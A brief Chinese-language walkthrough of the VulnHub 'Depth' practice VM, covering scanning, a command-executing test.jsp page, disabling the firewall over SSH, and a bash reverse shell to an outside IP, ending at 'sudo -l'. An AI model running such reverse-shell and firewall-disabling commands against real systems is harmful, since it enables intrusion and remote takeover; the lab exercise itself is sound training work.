一、下载地址
https://download.vulnhub.com/depth/DepthB2R.ova
二、获取靶机IP地址
1、修改网卡配置为net,同时扫描同一网段的机器
2.得到靶机IP,同时扫描服务器版本和端口信息
3.扫描该靶机目录
三、访问靶机IP
1.拼接扫描出来的目录
通过访问,拼接/manager/只会弹出个输入框
通过拼接/test.jsp,得到一个输入框
2.根据提示输入 ls -l /tmp ,可以执行
尝试输入 ls -l /home ,等到buil用户
输入ps -aux,查看进程
发现sshd正在使用中,可能是被防火墙限制了
3.尝试关闭防火墙
ssh bill@localhost sudo ufw disable
4.利用ssh反弹shell
ssh bill@localhost bash -i >& /dev/tcp/47.99.195.123/8888 0>&1
5.成功反弹上
四、提权
1.利用sudo提权
sudo -l